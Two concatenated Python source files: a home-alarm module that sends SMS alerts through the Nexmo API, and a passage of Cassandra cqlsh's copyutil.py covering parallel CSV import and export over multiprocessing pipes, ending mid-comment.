import nexmo # SMS Provider
from subprocess import call # to execute a shell command
from threading import Thread # to launch an async thread
from datetime import datetime
from utils.util_date import pretty_date
from utils.config_helper import env_config_from_json
from utils.emails import EmailNexmoBalance # for low nexmo balance alert
logger = logging.getLogger('alarm.utils.sms')
conf_filename = 'sms_config_secret.json' # Shall include *secret* for gitignore
module = abspath(dirname(__file__)) # Absolute path of the directory where this program resides
src = abspath(dirname(module)) # Absolute path of the parent directory
project = abspath(dirname(src)) # Absolute path of the parent directory
env = abspath(dirname(project)) # Absolute path of the parent directory
conf_file = join(env, 'home_alarm_CONFIG/', 'software/', conf_filename)
class SmsGateway():
""" Gateway to Nexmo SMS provider.
This class provides a simple method send(text_body)
    This class gets its configuration from a JSON secret file
Example of call: SmsGateway().send(text_body)
    Example of the content of the secret conf file:
    {
        "common" : {
            "NEXMO_API_KEY" : "foo",
            "NEXMO_API_SECRET" : "bar",
            "ADMIN_PHONES" : ["33600000000"]
        },
        "production" : {
            "USERS_PHONES" : ["33600000000"]
        },
        "development" : {
            "USERS_PHONES" : ["33600000000"]
        }
    }
"""
def __init__(self):
# Load secret config (API Key, phone numbers)
try:
self.conf = env_config_from_json(conf_file)
except Exception as e:
logger.exception('Init sms conf failed')
raise
# Create Nexmo instance
try:
self.provider = nexmo.Client(key=self.conf['NEXMO_API_KEY'], secret=self.conf['NEXMO_API_SECRET'])
except Exception as e:
logger.exception('Init Nexmo failed')
raise
def send(self, body, admin_only=None):
""" Start Thread to send asynchronously
"""
if (admin_only):
recipients = self.conf['ADMIN_NUMBER']
else:
recipients = self.conf['RECIPIENTS_NUMBER']
thread = Thread(target=self.thread_send, args=[body, recipients])
thread.start()
def thread_send(self, body, recipients):
""" Call Nexmo API to send SMS
https://developer.nexmo.com/api/sms?utm_source=DEV_REL&utm_medium=github&utm_campaign=python-client-library#send-an-sms
"""
try:
for recipient in recipients:
sms = {}
sms['from'] = self.conf['SENDER_NAME']
sms['to'] = recipient
sms['text'] = body
logger.debug(str(sms))
http_response = self.provider.send_message(sms)
response = http_response['messages'][0]
if response['status'] == '0':
logger.info('SMS sent to %s' % (recipient))
else:
logger.error('SMS Fail to %s Error: %s' % (recipient, response['error-text']))
# log nexmo balance
balance = '%.1f' % (float(response['remaining-balance']))
logger.info('Remaining balance is %s' % (balance))
except Exception as e:
logger.exception('Failed sending SMS')
# Email the balance value to admin
try: EmailNexmoBalance(response['remaining-balance'])
except: pass
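# Hedged illustration (not part of the original module): a minimal sketch of how
# SmsGateway is used directly; the message texts are hypothetical examples.
def _example_sms_gateway():
    gateway = SmsGateway()
    gateway.send('Home Alarm test message')                      # all configured recipients
    gateway.send('Low Nexmo balance warning', admin_only=True)   # admin numbers only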
class SmsAlarmAlert():
""" This class sends SMS Alert from Alarm Processes.
This class rely on SmsGateway() Class
example of call: SmsAlarmAlert("Info", "Nox", "started")
"""
def __init__(self, level, module, event):
""" Send Sms from Alarm System.
level: Info / Alert / Error
module : Nox / Ext / Other
event : started / stopped / detection
"""
try:
date = pretty_date(datetime.now())
self.sms_gateway = SmsGateway()
body = "Home Alarm %s %s %s %s" % (level, module, event, date)
logger.debug('Sending SMS %s' % (body))
self.sms_gateway.send(body)
except:
logger.exception("Error when sending sms")
return
|
copyutil.py
|
# cython: profile=True
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import csv
import datetime
import json
import glob
import multiprocessing as mp
import os
import platform
import random
import re
import signal
import six
import struct
import sys
import threading
import time
import traceback
import errno
from bisect import bisect_right
from calendar import timegm
from collections import defaultdict, namedtuple
from decimal import Decimal
from random import randint
from io import BytesIO, StringIO
from select import select
from uuid import UUID
from .util import profile_on, profile_off
from six import ensure_str, ensure_text
from six.moves import configparser
from six.moves import range
from six.moves.queue import Queue
from cassandra import OperationTimedOut
from cassandra.cluster import Cluster, DefaultConnection
from cassandra.cqltypes import ReversedType, UserType, VarcharType
from cassandra.metadata import protect_name, protect_names, protect_value
from cassandra.policies import RetryPolicy, WhiteListRoundRobinPolicy, DCAwareRoundRobinPolicy, FallthroughRetryPolicy
from cassandra.query import BatchStatement, BatchType, SimpleStatement, tuple_factory
from cassandra.util import Date, Time
from cqlshlib.util import profile_on, profile_off
from cqlshlib.cql3handling import CqlRuleSet
from cqlshlib.displaying import NO_COLOR_MAP
from cqlshlib.formatting import format_value_default, CqlType, DateTimeFormat, EMPTY, get_formatter, BlobType
from cqlshlib.sslhandling import ssl_settings
PROFILE_ON = False
STRACE_ON = False
DEBUG = False # This may be set to True when initializing the task
IS_LINUX = platform.system() == 'Linux'
CopyOptions = namedtuple('CopyOptions', 'copy dialect unrecognized')
def safe_normpath(fname):
"""
:return the normalized path but only if there is a filename, we don't want to convert
an empty string (which means no file name) to a dot. Also expand any user variables such as ~ to the full path
"""
return os.path.normpath(os.path.expanduser(fname)) if fname else fname
def printdebugmsg(msg):
if DEBUG:
printmsg(msg)
def printmsg(msg, eol='\n', encoding='utf8'):
sys.stdout.write(msg)
sys.stdout.write(eol)
sys.stdout.flush()
# Keep arguments in sync with printmsg
def swallowmsg(msg, eol='', encoding=''):
    pass
class OneWayPipe(object):
"""
A one way pipe protected by two process level locks, one for reading and one for writing.
"""
def __init__(self):
self.reader, self.writer = mp.Pipe(duplex=False)
self.rlock = mp.Lock()
self.wlock = mp.Lock()
def send(self, obj):
with self.wlock:
self.writer.send(obj)
def recv(self):
with self.rlock:
return self.reader.recv()
def close(self):
self.reader.close()
self.writer.close()
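# Hedged illustration (not part of the upstream module): a minimal sketch of OneWayPipe
# usage. In copyutil the send() and recv() ends normally live in different processes;
# here both ends are exercised in-process purely to show the call pattern.
def _example_one_way_pipe():
    pipe = OneWayPipe()
    pipe.send(('token_range', 42))  # hypothetical payload
    received = pipe.recv()
    pipe.close()
    return received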
class ReceivingChannel(object):
"""
A one way channel that wraps a pipe to receive messages.
"""
def __init__(self, pipe):
self.pipe = pipe
def recv(self):
return self.pipe.recv()
def close(self):
self.pipe.close()
class SendingChannel(object):
"""
A one way channel that wraps a pipe and provides a feeding thread to send messages asynchronously.
"""
def __init__(self, pipe):
self.pipe = pipe
self.pending_messages = Queue()
def feed():
while True:
try:
msg = self.pending_messages.get()
self.pipe.send(msg)
except Exception as e:
printmsg('%s: %s' % (e.__class__.__name__, e.message if hasattr(e, 'message') else str(e)))
feeding_thread = threading.Thread(target=feed)
feeding_thread.setDaemon(True)
feeding_thread.start()
def send(self, obj):
self.pending_messages.put(obj)
def num_pending(self):
return self.pending_messages.qsize() if self.pending_messages else 0
def close(self):
self.pipe.close()
class SendingChannels(object):
"""
A group of one way channels for sending messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in range(num_channels)]
self.channels = [SendingChannel(p) for p in self.pipes]
self.num_channels = num_channels
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
class ReceivingChannels(object):
"""
A group of one way channels for receiving messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in range(num_channels)]
self.channels = [ReceivingChannel(p) for p in self.pipes]
self._readers = [p.reader for p in self.pipes]
self._rlocks = [p.rlock for p in self.pipes]
self._rlocks_by_readers = dict([(p.reader, p.rlock) for p in self.pipes])
self.num_channels = num_channels
self.recv = self.recv_select if IS_LINUX else self.recv_polling
def recv_select(self, timeout):
"""
Implementation of the recv method for Linux, where select is available. Receive an object from
all pipes that are ready for reading without blocking.
"""
while True:
try:
readable, _, _ = select(self._readers, [], [], timeout)
except select.error as exc:
# TODO: PEP 475 in Python 3.5 should make this unnecessary
# Do not abort on window resize:
if exc[0] != errno.EINTR:
raise
else:
break
for r in readable:
with self._rlocks_by_readers[r]:
try:
yield r.recv()
except EOFError:
continue
def recv_polling(self, timeout):
"""
Implementation of the recv method for platforms where select() is not available for pipes.
        We poll on all of the readers with a very small timeout. We stop once the specified
        timeout has elapsed, but we may exceed it since we check all processes during each sweep.
"""
start = time.time()
while True:
for i, r in enumerate(self._readers):
with self._rlocks[i]:
if r.poll(0.000000001):
try:
yield r.recv()
except EOFError:
continue
if time.time() - start > timeout:
break
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
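# Hedged illustration (not part of the upstream module): a minimal sketch of how the two
# channel groups are paired up, mirroring CopyTask.update_params() below. The parent's
# sending pipe i becomes worker i's receiving end and vice versa; nothing here is executed.
def _example_channel_wiring(num_workers):
    outmsg = SendingChannels(num_workers)    # parent -> workers
    inmsg = ReceivingChannels(num_workers)   # workers -> parent
    worker_params = [{'inpipe': outmsg.pipes[i], 'outpipe': inmsg.pipes[i]}
                     for i in range(num_workers)]
    return outmsg, inmsg, worker_params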
class CopyTask(object):
"""
A base class for ImportTask and ExportTask
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, direction):
self.shell = shell
self.ks = ks
self.table = table
self.table_meta = self.shell.get_table_meta(self.ks, self.table)
self.host = shell.conn.get_control_connection_host()
self.fname = safe_normpath(fname)
self.protocol_version = protocol_version
self.config_file = config_file
# if cqlsh is invoked with --debug then set the global debug flag to True
if shell.debug:
global DEBUG
DEBUG = True
# do not display messages when exporting to STDOUT unless --debug is set
self.printmsg = printmsg if self.fname is not None or direction == 'from' or DEBUG \
else swallowmsg
self.options = self.parse_options(opts, direction)
self.num_processes = self.options.copy['numprocesses']
self.encoding = self.options.copy['encoding']
self.printmsg('Using %d child processes' % (self.num_processes,))
if direction == 'from':
self.num_processes += 1 # add the feeder process
self.processes = []
self.inmsg = ReceivingChannels(self.num_processes)
self.outmsg = SendingChannels(self.num_processes)
self.columns = CopyTask.get_columns(shell, ks, table, columns)
self.time_start = time.time()
def maybe_read_config_file(self, opts, direction):
"""
Read optional sections from a configuration file that was specified in the command options or from the default
cqlshrc configuration file if none was specified.
"""
config_file = opts.pop('configfile', '')
if not config_file:
config_file = self.config_file
if not os.path.isfile(config_file):
return opts
configs = configparser.RawConfigParser()
configs.readfp(open(config_file))
ret = dict()
config_sections = list(['copy', 'copy-%s' % (direction,),
'copy:%s.%s' % (self.ks, self.table),
'copy-%s:%s.%s' % (direction, self.ks, self.table)])
for section in config_sections:
if configs.has_section(section):
options = dict(configs.items(section))
self.printmsg("Reading options from %s:[%s]: %s" % (config_file, section, options))
ret.update(options)
# Update this last so the command line options take precedence over the configuration file options
if opts:
self.printmsg("Reading options from the command line: %s" % (opts,))
ret.update(opts)
if self.shell.debug: # this is important for testing, do not remove
self.printmsg("Using options: '%s'" % (ret,))
return ret
@staticmethod
def clean_options(opts):
"""
Convert all option values to valid string literals unless they are path names
"""
        return dict([(k, v if k not in ['errfile', 'ratefile'] else v)
                     for k, v in opts.items()])
def parse_options(self, opts, direction):
"""
Parse options for import (COPY FROM) and export (COPY TO) operations.
Extract from opts csv and dialect options.
:return: 3 dictionaries: the csv options, the dialect options, any unrecognized options.
"""
shell = self.shell
opts = self.clean_options(self.maybe_read_config_file(opts, direction))
dialect_options = dict()
dialect_options['quotechar'] = ensure_str(opts.pop('quote', '"'))
dialect_options['escapechar'] = ensure_str(opts.pop('escape', '\\'))
dialect_options['delimiter'] = ensure_str(opts.pop('delimiter', ','))
if dialect_options['quotechar'] == dialect_options['escapechar']:
dialect_options['doublequote'] = True
del dialect_options['escapechar']
else:
dialect_options['doublequote'] = False
copy_options = dict()
copy_options['nullval'] = ensure_str(opts.pop('null', ''))
copy_options['header'] = bool(opts.pop('header', '').lower() == 'true')
copy_options['encoding'] = opts.pop('encoding', 'utf8')
copy_options['maxrequests'] = int(opts.pop('maxrequests', 6))
copy_options['pagesize'] = int(opts.pop('pagesize', 1000))
# by default the page timeout is 10 seconds per 1000 entries
# in the page size or 10 seconds if pagesize is smaller
copy_options['pagetimeout'] = int(opts.pop('pagetimeout', max(10, 10 * (copy_options['pagesize'] / 1000))))
copy_options['maxattempts'] = int(opts.pop('maxattempts', 5))
copy_options['dtformats'] = DateTimeFormat(opts.pop('datetimeformat', shell.display_timestamp_format),
shell.display_date_format, shell.display_nanotime_format,
milliseconds_only=True)
copy_options['floatprecision'] = int(opts.pop('floatprecision', '5'))
copy_options['doubleprecision'] = int(opts.pop('doubleprecision', '12'))
copy_options['chunksize'] = int(opts.pop('chunksize', 5000))
copy_options['ingestrate'] = int(opts.pop('ingestrate', 100000))
copy_options['maxbatchsize'] = int(opts.pop('maxbatchsize', 20))
copy_options['minbatchsize'] = int(opts.pop('minbatchsize', 10))
copy_options['reportfrequency'] = float(opts.pop('reportfrequency', 0.25))
copy_options['consistencylevel'] = shell.consistency_level
copy_options['decimalsep'] = opts.pop('decimalsep', '.')
copy_options['thousandssep'] = opts.pop('thousandssep', '')
copy_options['boolstyle'] = [ensure_str(s.strip()) for s in opts.pop('boolstyle', 'True, False').split(',')]
copy_options['numprocesses'] = int(opts.pop('numprocesses', self.get_num_processes(16)))
copy_options['begintoken'] = opts.pop('begintoken', '')
copy_options['endtoken'] = opts.pop('endtoken', '')
copy_options['maxrows'] = int(opts.pop('maxrows', '-1'))
copy_options['skiprows'] = int(opts.pop('skiprows', '0'))
copy_options['skipcols'] = opts.pop('skipcols', '')
copy_options['maxparseerrors'] = int(opts.pop('maxparseerrors', '-1'))
copy_options['maxinserterrors'] = int(opts.pop('maxinserterrors', '1000'))
copy_options['errfile'] = safe_normpath(opts.pop('errfile', 'import_%s_%s.err' % (self.ks, self.table,)))
copy_options['ratefile'] = safe_normpath(opts.pop('ratefile', ''))
copy_options['maxoutputsize'] = int(opts.pop('maxoutputsize', '-1'))
copy_options['preparedstatements'] = bool(opts.pop('preparedstatements', 'true').lower() == 'true')
copy_options['ttl'] = int(opts.pop('ttl', -1))
# Hidden properties, they do not appear in the documentation but can be set in config files
# or on the cmd line but w/o completion
copy_options['maxinflightmessages'] = int(opts.pop('maxinflightmessages', '512'))
copy_options['maxbackoffattempts'] = int(opts.pop('maxbackoffattempts', '12'))
copy_options['maxpendingchunks'] = int(opts.pop('maxpendingchunks', '24'))
# set requesttimeout to a value high enough so that maxbatchsize rows will never timeout if the server
# responds: here we set it to 1 sec per 10 rows but no less than 60 seconds
copy_options['requesttimeout'] = int(opts.pop('requesttimeout', max(60, 1 * copy_options['maxbatchsize'] / 10)))
# set childtimeout higher than requesttimeout so that child processes have a chance to report request timeouts
copy_options['childtimeout'] = int(opts.pop('childtimeout', copy_options['requesttimeout'] + 30))
self.check_options(copy_options)
return CopyOptions(copy=copy_options, dialect=dialect_options, unrecognized=opts)
@staticmethod
def check_options(copy_options):
"""
Check any options that require a sanity check beyond a simple type conversion and if required
raise a value error:
- boolean styles must be exactly 2, they must be different and they cannot be empty
"""
bool_styles = copy_options['boolstyle']
if len(bool_styles) != 2 or bool_styles[0] == bool_styles[1] or not bool_styles[0] or not bool_styles[1]:
raise ValueError("Invalid boolean styles %s" % copy_options['boolstyle'])
@staticmethod
def get_num_processes(cap):
"""
Pick a reasonable number of child processes. We need to leave at
least one core for the parent or feeder process.
"""
return max(1, min(cap, CopyTask.get_num_cores() - 1))
@staticmethod
def get_num_cores():
"""
Return the number of cores if available. If the test environment variable
is set, then return the number carried by this variable. This is to test single-core
machine more easily.
"""
try:
num_cores_for_testing = os.environ.get('CQLSH_COPY_TEST_NUM_CORES', '')
ret = int(num_cores_for_testing) if num_cores_for_testing else mp.cpu_count()
printdebugmsg("Detected %d core(s)" % (ret,))
return ret
except NotImplementedError:
printdebugmsg("Failed to detect number of cores, returning 1")
return 1
@staticmethod
def describe_interval(seconds):
desc = []
for length, unit in ((86400, 'day'), (3600, 'hour'), (60, 'minute')):
            num = int(seconds) // length
if num > 0:
desc.append('%d %s' % (num, unit))
if num > 1:
desc[-1] += 's'
seconds %= length
words = '%.03f seconds' % seconds
if len(desc) > 1:
words = ', '.join(desc) + ', and ' + words
elif len(desc) == 1:
words = desc[0] + ' and ' + words
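        # e.g. describe_interval(3725.5) -> '1 hour, 2 minutes, and 5.500 seconds'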
return words
@staticmethod
def get_columns(shell, ks, table, columns):
"""
Return all columns if none were specified or only the columns specified.
Possible enhancement: introduce a regex like syntax (^) to allow users
to specify all columns except a few.
"""
return shell.get_column_names(ks, table) if not columns else columns
def close(self):
self.stop_processes()
self.inmsg.close()
self.outmsg.close()
def num_live_processes(self):
return sum(1 for p in self.processes if p.is_alive())
@staticmethod
def get_pid():
return os.getpid() if hasattr(os, 'getpid') else None
@staticmethod
def trace_process(pid):
if pid and STRACE_ON:
os.system("strace -vvvv -c -o strace.{pid}.out -e trace=all -p {pid}&".format(pid=pid))
def start_processes(self):
for i, process in enumerate(self.processes):
process.start()
self.trace_process(process.pid)
self.trace_process(self.get_pid())
def stop_processes(self):
for process in self.processes:
process.terminate()
def make_params(self):
"""
Return a dictionary of parameters to be used by the worker processes.
On platforms using 'spawn' as the default multiprocessing start method,
this dictionary must be picklable.
"""
shell = self.shell
return dict(ks=self.ks,
table=self.table,
local_dc=self.host.datacenter,
columns=self.columns,
options=self.options,
connect_timeout=shell.conn.connect_timeout,
hostname=self.host.address,
port=shell.port,
ssl=shell.ssl,
auth_provider=shell.auth_provider,
cql_version=shell.conn.cql_version,
config_file=self.config_file,
protocol_version=self.protocol_version,
debug=shell.debug,
coverage=shell.coverage,
coveragerc_path=shell.coveragerc_path
)
def validate_columns(self):
shell = self.shell
if not self.columns:
shell.printerr("No column specified")
return False
for c in self.columns:
if c not in self.table_meta.columns:
shell.printerr('Invalid column name %s' % (c,))
return False
return True
def update_params(self, params, i):
"""
Add the communication pipes to the parameters to be passed to the worker process:
inpipe is the message pipe flowing from parent to child process, so outpipe from the parent point
of view and, vice-versa, outpipe is the message pipe flowing from child to parent, so inpipe
from the parent point of view, hence the two are swapped below.
"""
params['inpipe'] = self.outmsg.pipes[i]
params['outpipe'] = self.inmsg.pipes[i]
return params
class ExportWriter(object):
"""
A class that writes to one or more csv files, or STDOUT
"""
def __init__(self, fname, shell, columns, options):
self.fname = fname
self.shell = shell
self.columns = columns
self.options = options
self.header = options.copy['header']
self.max_output_size = int(options.copy['maxoutputsize'])
self.current_dest = None
self.num_files = 0
if self.max_output_size > 0:
if fname is not None:
self.write = self._write_with_split
self.num_written = 0
else:
shell.printerr("WARNING: maxoutputsize {} ignored when writing to STDOUT".format(self.max_output_size))
self.write = self._write_without_split
else:
self.write = self._write_without_split
def open(self):
self.current_dest = self._get_dest(self.fname)
if self.current_dest is None:
return False
if self.header:
writer = csv.writer(self.current_dest.output, **self.options.dialect)
writer.writerow([ensure_str(c) for c in self.columns])
return True
def close(self):
self._close_current_dest()
def _next_dest(self):
self._close_current_dest()
self.current_dest = self._get_dest(self.fname + '.%d' % (self.num_files,))
def _get_dest(self, source_name):
"""
Open the output file if any or else use stdout. Return a namedtuple
containing the out and a boolean indicating if the output should be closed.
"""
CsvDest = namedtuple('CsvDest', 'output close')
if self.fname is None:
return CsvDest(output=sys.stdout, close=False)
else:
try:
ret = CsvDest(output=open(source_name, 'w'), close=True)
self.num_files += 1
return ret
except IOError as e:
self.shell.printerr("Can't open %r for writing: %s" % (source_name, e))
return None
def _close_current_dest(self):
if self.current_dest and self.current_dest.close:
self.current_dest.output.close()
self.current_dest = None
def _write_without_split(self, data, _):
"""
Write the data to the current destination output.
"""
self.current_dest.output.write(data)
def _write_with_split(self, data, num):
"""
Write the data to the current destination output if we still
haven't reached the maximum number of rows. Otherwise split
the rows between the current destination and the next.
"""
if (self.num_written + num) > self.max_output_size:
num_remaining = self.max_output_size - self.num_written
last_switch = 0
for i, row in enumerate([_f for _f in data.split(os.linesep) if _f]):
if i == num_remaining:
self._next_dest()
last_switch = i
num_remaining += self.max_output_size
self.current_dest.output.write(row + '\n')
self.num_written = num - last_switch
else:
self.num_written += num
self.current_dest.output.write(data)
class ExportTask(CopyTask):
"""
A class that exports data to .csv by instantiating one or more processes that work in parallel (ExportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'to')
options = self.options
self.begin_token = int(options.copy['begintoken']) if options.copy['begintoken'] else None
self.end_token = int(options.copy['endtoken']) if options.copy['endtoken'] else None
self.writer = ExportWriter(fname, shell, columns, options)
def run(self):
"""
Initiates the export by starting the worker processes.
Then hand over control to export_records.
"""
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY TO options: %s' % ', '.join(list(self.options.unrecognized.keys())))
return
if not self.validate_columns():
return 0
ranges = self.get_ranges()
if not ranges:
return 0
if not self.writer.open():
return 0
columns = "[" + ", ".join(self.columns) + "]"
self.printmsg("\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
params = self.make_params()
for i in range(self.num_processes):
self.processes.append(ExportProcess(self.update_params(params, i)))
self.start_processes()
try:
self.export_records(ranges)
finally:
self.close()
def close(self):
CopyTask.close(self)
self.writer.close()
def get_ranges(self):
"""
        Return a dict keyed by token range (from, to]; each value describes the hosts that
        own that range (plus retry bookkeeping). Each host is responsible
for all the tokens in the range (from, to].
The ring information comes from the driver metadata token map, which is built by
querying System.PEERS.
We only consider replicas that are in the local datacenter. If there are no local replicas
we use the cqlsh session host.
"""
shell = self.shell
hostname = self.host.address
local_dc = self.host.datacenter
ranges = dict()
min_token = self.get_min_token()
begin_token = self.begin_token
end_token = self.end_token
def make_range(prev, curr):
"""
Return the intersection of (prev, curr) and (begin_token, end_token),
return None if the intersection is empty
"""
ret = (prev, curr)
if begin_token:
if curr < begin_token:
return None
elif (prev is None) or (prev < begin_token):
ret = (begin_token, curr)
if end_token:
if (ret[0] is not None) and (ret[0] > end_token):
return None
elif (curr is not None) and (curr > end_token):
ret = (ret[0], end_token)
return ret
def make_range_data(replicas=None):
hosts = []
if replicas:
for r in replicas:
if r.is_up is not False and r.datacenter == local_dc:
hosts.append(r.address)
if not hosts:
hosts.append(hostname) # fallback to default host if no replicas in current dc
return {'hosts': tuple(hosts), 'attempts': 0, 'rows': 0, 'workerno': -1}
if begin_token and begin_token < min_token:
shell.printerr('Begin token %d must be bigger or equal to min token %d' % (begin_token, min_token))
return ranges
if begin_token and end_token and begin_token > end_token:
shell.printerr('Begin token %d must be smaller than end token %d' % (begin_token, end_token))
return ranges
if shell.conn.metadata.token_map is None or min_token is None:
ranges[(begin_token, end_token)] = make_range_data()
return ranges
ring = list(shell.get_ring(self.ks).items())
ring.sort()
if not ring:
# If the ring is empty we get the entire ring from the host we are currently connected to
ranges[(begin_token, end_token)] = make_range_data()
elif len(ring) == 1:
# If there is only one token we get the entire ring from the replicas for that token
ranges[(begin_token, end_token)] = make_range_data(ring[0][1])
else:
# else we loop on the ring
first_range_data = None
previous = None
for token, replicas in ring:
if not first_range_data:
first_range_data = make_range_data(replicas) # we use it at the end when wrapping around
if token.value == min_token:
continue # avoids looping entire ring
current_range = make_range(previous, token.value)
if not current_range:
continue
ranges[current_range] = make_range_data(replicas)
previous = token.value
# For the last ring interval we query the same replicas that hold the first token in the ring
if previous is not None and (not end_token or previous < end_token):
ranges[(previous, end_token)] = first_range_data
elif previous is None and (not end_token or previous < end_token):
previous = begin_token if begin_token else min_token
ranges[(previous, end_token)] = first_range_data
if not ranges:
shell.printerr('Found no ranges to query, check begin and end tokens: %s - %s' % (begin_token, end_token))
return ranges
def get_min_token(self):
"""
:return the minimum token, which depends on the partitioner.
For partitioners that do not support tokens we return None, in
        these cases we will not work in parallel; we'll just send all requests
to the cqlsh session host.
"""
partitioner = self.shell.conn.metadata.partitioner
if partitioner.endswith('RandomPartitioner'):
return -1
elif partitioner.endswith('Murmur3Partitioner'):
return -(2 ** 63) # Long.MIN_VALUE in Java
else:
return None
def send_work(self, ranges, tokens_to_send):
prev_worker_no = ranges[tokens_to_send[0]]['workerno']
i = prev_worker_no + 1 if -1 <= prev_worker_no < (self.num_processes - 1) else 0
for token_range in tokens_to_send:
ranges[token_range]['workerno'] = i
self.outmsg.channels[i].send((token_range, ranges[token_range]))
ranges[token_range]['attempts'] += 1
i = i + 1 if i < self.num_processes - 1 else 0
def export_records(self, ranges):
"""
Send records to child processes and monitor them by collecting their results
or any errors. We terminate when we have processed all the ranges or when one child
process has died (since in this case we will never get any ACK for the ranges
processed by it and at the moment we don't keep track of which ranges a
process is handling).
"""
shell = self.shell
processes = self.processes
meter = RateMeter(log_fcn=self.printmsg,
update_interval=self.options.copy['reportfrequency'],
log_file=self.options.copy['ratefile'])
total_requests = len(ranges)
max_attempts = self.options.copy['maxattempts']
self.send_work(ranges, list(ranges.keys()))
num_processes = len(processes)
succeeded = 0
failed = 0
while (failed + succeeded) < total_requests and self.num_live_processes() == num_processes:
for token_range, result in self.inmsg.recv(timeout=0.1):
if token_range is None and result is None: # a request has finished
succeeded += 1
elif isinstance(result, Exception): # an error occurred
# This token_range failed, retry up to max_attempts if no rows received yet,
# If rows were already received we'd risk duplicating data.
# Note that there is still a slight risk of duplicating data, even if we have
# an error with no rows received yet, it's just less likely. To avoid retrying on
# all timeouts would however mean we could risk not exporting some rows.
if ranges[token_range]['attempts'] < max_attempts and ranges[token_range]['rows'] == 0:
shell.printerr('Error for %s: %s (will try again later attempt %d of %d)'
% (token_range, result, ranges[token_range]['attempts'], max_attempts))
self.send_work(ranges, [token_range])
else:
shell.printerr('Error for %s: %s (permanently given up after %d rows and %d attempts)'
% (token_range, result, ranges[token_range]['rows'],
ranges[token_range]['attempts']))
failed += 1
else: # partial result received
data, num = result
self.writer.write(data, num)
meter.increment(n=num)
ranges[token_range]['rows'] += num
if self.num_live_processes() < len(processes):
for process in processes:
if not process.is_alive():
shell.printerr('Child process %d died with exit code %d' % (process.pid, process.exitcode))
if succeeded < total_requests:
shell.printerr('Exported %d ranges out of %d total ranges, some records might be missing'
% (succeeded, total_requests))
self.printmsg("\n%d rows exported to %d files in %s." %
(meter.get_total_records(),
self.writer.num_files,
self.describe_interval(time.time() - self.time_start)))
class FilesReader(object):
"""
A wrapper around a csv reader to keep track of when we have
exhausted reading input files. We are passed a comma separated
list of paths, where each path is a valid glob expression.
We generate a source generator and we read each source one
by one.
"""
def __init__(self, fname, options):
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.fname = fname
self.sources = None # might be initialised directly here? (see CASSANDRA-17350)
self.num_sources = 0
self.current_source = None
self.num_read = 0
def get_source(self, paths):
"""
Return a source generator. Each source is a named tuple
wrapping the source input, file name and a boolean indicating
if it requires closing.
"""
def make_source(fname):
try:
return open(fname, 'r')
except IOError as e:
raise IOError("Can't open %r for reading: %s" % (fname, e))
for path in paths.split(','):
path = path.strip()
if os.path.isfile(path):
yield make_source(path)
else:
result = glob.glob(path)
if len(result) == 0:
raise IOError("Can't open %r for reading: no matching file found" % (path,))
for f in result:
yield (make_source(f))
def start(self):
self.sources = self.get_source(self.fname)
self.next_source()
@property
def exhausted(self):
return not self.current_source
def next_source(self):
"""
Close the current source, if any, and open the next one. Return true
if there is another source, false otherwise.
"""
self.close_current_source()
while self.current_source is None:
try:
self.current_source = next(self.sources)
if self.current_source:
self.num_sources += 1
except StopIteration:
return False
if self.header:
next(self.current_source)
return True
def close_current_source(self):
if not self.current_source:
return
self.current_source.close()
self.current_source = None
def close(self):
self.close_current_source()
def read_rows(self, max_rows):
if not self.current_source:
return []
rows = []
for i in range(min(max_rows, self.chunk_size)):
try:
row = next(self.current_source)
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.next_source()
break
if self.num_read > self.skip_rows:
rows.append(row)
except StopIteration:
self.next_source()
break
return [_f for _f in rows if _f]
class PipeReader(object):
"""
A class for reading rows received on a pipe, this is used for reading input from STDIN
"""
def __init__(self, inpipe, options):
self.inpipe = inpipe
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.num_read = 0
self.exhausted = False
self.num_sources = 1
def start(self):
pass
def read_rows(self, max_rows):
rows = []
for i in range(min(max_rows, self.chunk_size)):
row = self.inpipe.recv()
if row is None:
self.exhausted = True
break
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.exhausted = True
break # max rows exceeded
if self.header or self.num_read < self.skip_rows:
self.header = False # skip header or initial skip_rows rows
continue
rows.append(row)
return rows
class ImportProcessResult(object):
"""
An object sent from ImportProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, imported=0):
self.imported = imported
class FeedingProcessResult(object):
"""
An object sent from FeedingProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, sent, reader):
self.sent = sent
self.num_sources = reader.num_sources
self.skip_rows = reader.skip_rows
class ImportTaskError(object):
"""
An object sent from child processes (feeder or workers) to the parent import task to indicate an error.
"""
def __init__(self, name, msg, rows=None, attempts=1, final=True):
self.name = name
self.msg = msg
self.rows = rows if rows else []
self.attempts = attempts
self.final = final
def is_parse_error(self):
"""
        We treat read and parse errors as unrecoverable, and we keep separate global counters for giving up when
        a maximum has been reached. We consider value and type errors as parse errors as well, since they
        are typically non-recoverable.
"""
name = self.name
return name.startswith('ValueError') or name.startswith('TypeError') or \
name.startswith('ParseError') or name.startswith('IndexError') or name.startswith('ReadError')
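# Illustrative sketch: error names beginning with ValueError, TypeError, ParseError, IndexError or
# ReadError are treated as parse errors (counted against MAXPARSEERRORS and never retried), while
# everything else counts against MAXINSERTERRORS. A hypothetical classifier using the class above:
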